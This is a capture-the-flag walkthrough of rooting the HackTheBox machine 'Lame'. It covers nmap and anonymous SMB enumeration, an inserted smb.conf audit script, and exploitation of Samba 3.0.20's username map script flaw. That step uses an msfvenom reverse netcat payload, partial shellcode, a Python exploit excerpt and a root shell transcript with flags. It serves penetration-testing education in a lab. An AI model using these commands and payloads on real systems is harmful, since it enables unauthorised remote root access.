HackTheBox Write-up — Lame
Introduction
This article is a walkthrough of the methodology used to gain root access on the Linux machine named "Lame" on the HackTheBox platform.
Disclaimer: As with all things related to ethical hacking, this machine is an intentionally vulnerable machine whose purpose is to teach ethical hacking techniques. The techniques mentioned should NOT be used for illegal purposes, and should NOT be used on machines without prior authorization from the machine owner.
Methodology
Scanning and Enumeration
Connect to the HTB VPN if you haven't yet. I am already connected; my IP is 10.10.14.6 and the target machine is at 10.10.10.3.
Let's scan all TCP ports to find interesting information on them:
> sudo nmap -sS -T4 -p- -A 10.10.10.3 -oA scanningAndEnumeration/lameTcpPortsAll
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-11 12:32 EST
Nmap scan report for 10.10.10.3
Host is up (0.27s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.6
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
[snip]
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
[snip]
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h33m59s, deviation: 3h32m11s, median: 3m56s
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name:
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2020-12-11T12:42:49-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   268.37 ms 10.10.14.1
2   268.31 ms 10.10.10.3
[snip]
We see a lot of ports open here. For example, we now know that it's a Linux machine (look at the smb-os-discovery nmap script output). It is also running SSH and SMB (Samba). We can try to list the SMB shares using smbclient:
> smbclient -L \\\\10.10.10.3\\
Enter WORKGROUP\kali's password:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk
        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            LAME
We are able to list shares as an anonymous user! This is a serious issue, and it should definitely be reported to the client if this were an actual penetration test. Let's try connecting to the tmp share, which exposes the /tmp directory of the victim machine:
> smbclient -N \\\\10.10.10.3\\tmp
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Dec 12 03:23:07 2020
  ..                                 DR        0  Sat Oct 31 03:33:58 2020
  .ICE-unix                          DH        0  Sat Dec 12 02:19:02 2020
  vmware-root                        DR        0  Sat Dec 12 02:19:34 2020
  .X11-unix                          DH        0  Sat Dec 12 02:19:29 2020
  .X0-lock                           HR       11  Sat Dec 12 02:19:29 2020
  5562.jsvc_up                        R        0  Sat Dec 12 02:20:07 2020
  vgauthsvclog.txt.0                  R     1600  Sat Dec 12 02:19:00 2020

                7282168 blocks of size 1024. 5386548 blocks available
We see a bunch of files here, but nothing of interest. We can also test whether anonymous users are allowed to upload files, using the "put" command.
Create a file named test.txt:
┌──(kali㉿kali)-[~/peh/lame]
└─$ echo "hello" > test.txt
Upload test.txt:
┌──(kali㉿kali)-[~/peh/lame]
└─$ smbclient -N \\\\10.10.10.3\\tmp
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> put test.txt
putting file test.txt as \test.txt (0.0 kb/s) (average 0.0 kb/s)
smb: \> ls
  .                                   D        0  Sat Dec 12 03:24:58 2020
  ..                                 DR        0  Sat Oct 31 03:33:58 2020
  .ICE-unix                          DH        0  Sat Dec 12 02:19:02 2020
  vmware-root                        DR        0  Sat Dec 12 02:19:34 2020
  .X11-unix                          DH        0  Sat Dec 12 02:19:29 2020
  .X0-lock                           HR       11  Sat Dec 12 02:19:29 2020
  5562.jsvc_up                        R        0  Sat Dec 12 02:20:07 2020
  test.txt                            A        6  Sat Dec 12 03:24:58 2020
  vgauthsvclog.txt.0                  R     1600  Sat Dec 12 02:19:00 2020

                7282168 blocks of size 1024. 5386544 blocks available
The file was uploaded successfully! Anonymous write access to a share is a bad security practice; report this to the client immediately.
We could enumerate even further to gather additional information (and you should, if this were a real pentest). But for now, let's move on to the next phase of our test: exploitation.
Exploitation
Kali ships a nifty tool called "searchsploit" that searches the local copy of Exploit-DB for exploits matching a given keyword.
> searchsploit samba 3.0.20
---------------------------------------------------------------------------------- ---------------------------
 Exploit Title                                                                    |  Path
---------------------------------------------------------------------------------- ---------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                           | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                            | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow                                            | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                    | linux_x86/dos/36741.py
---------------------------------------------------------------------------------- ---------------------------
Shellcodes: No Results
The "Username map script" Command Execution entry (unix/remote/16320.rb) matches our Samba 3.0.20 target exactly. It is a Metasploit module written in Ruby, but a little googling turns up a standalone Python version on GitHub that does the same thing. Reference: https://gist.github.com/joenorton8014/19aaa00e0088738fc429cff2669b9851#file-samba-usermap-exploit-py
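What made this path possible on Lame is a handful of Samba settings: anonymous sessions, a guest-writable share and the "username map script" directive that the 16320 exploit abuses. The audit script below is an added example, not code from the write-up or from the exploit; the smb.conf it checks is constructed to resemble the share listing above, and the option names are standard Samba directives.

```python
"""Audit an smb.conf for the weaknesses found on Lame (added example, not code
from the write-up). The sample config below is constructed for illustration."""

SAMPLE_SMB_CONF = """
[global]
   map to guest = Bad User
   username map script = /etc/samba/scripts/mapusers.sh
[tmp]
   comment = oh noes!
   path = /tmp
   read only = no
   public = yes
[opt]
   path = /opt
   guest ok = yes
"""

def parse_smb_conf(text):
    """Return {section: {key: value}} with keys lower-cased; ';'/'#' lines are comments."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ';#':
            continue
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1].strip().lower()
            sections[current] = {}
        elif '=' in line and current is not None:
            key, value = line.split('=', 1)
            sections[current][' '.join(key.lower().split())] = value.strip()
    return sections

def _yes(value): return value.strip().lower() in ('yes', 'true', '1')

def audit_smb_conf(text):
    """Return [(section, finding)] for the settings that made the attack path above possible."""
    conf, findings = parse_smb_conf(text), []
    g = conf.get('global', {})
    # 'username map script' runs a script with the client-supplied username: the vector
    # behind Exploit-DB 16320 on Samba 3.0.20 < 3.0.25rc3. Remove it or upgrade Samba.
    if 'username map script' in g:
        findings.append(('global', 'username map script is set'))
    if g.get('map to guest', 'never').lower() != 'never':
        findings.append(('global', 'map to guest allows anonymous sessions'))
    for name, o in conf.items():
        if name == 'global': continue
        guest = _yes(o.get('guest ok', o.get('public', 'no')))   # 'public' is a synonym
        writable = not _yes(o.get('read only', 'yes')) or _yes(o.get('writable', o.get('writeable', 'no')))
        if guest:
            findings.append((name, 'guest-writable share' if writable else 'guest-readable share'))
    return findings
```

Running audit_smb_conf(SAMPLE_SMB_CONF) flags the script directive, the anonymous mapping, tmp as guest-writable and opt as guest-readable, which is exactly what the smbclient session above observed from the outside.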
Let's generate our payload with msfvenom:
msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.6 LPORT=9999 -f python
Done! Now paste the generated buf lines into the Python exploit from earlier in place of its shellcode, and you will get a shell. I have not pasted the entire script here, but the excerpt below shows where the shellcode goes.
#!/usr/bin/python
from smb.SMBConnection import SMBConnection
import random, string
from smb import smb_structs
smb_structs.SUPPORT_SMB2 = False
import sys
# Just a python version of a very simple Samba exploit.
# It doesn't have to be pretty because the shellcode is executed
# in the username field.
# Based off this Metasploit module - https://www.exploit-db.com/exploits/16320/
# [snip]
# Shellcode:
# msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.35 LPORT=9999 -f python
buf = ""
buf += "\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x6b"
# [snip]
buf += "\x20"
# [snip]
Let's get our shell! Because the payload runs under the Samba daemon, the shell comes back with root privileges.
Start a netcat listener on port 9999, then run the exploit against the target:
python pySMBUserMap.py 10.10.10.3
Once the shell connects back, grab the root and user flags and submit them to HTB.
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 9999
listening on [any] 9999 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.3] 57217
pwd
/
whoami
root
hostname
lame
root@lame:/root# cat root.txt
b2b3501b249d8040f5e5d316ed8fff14
root@lame:/root#
root@lame:/home/makis# cat user.txt
0e07ee8a05af02903c05cb84966bdfa7
root@lame:/home/makis#
That's how you go about rooting this box. I hope this was helpful!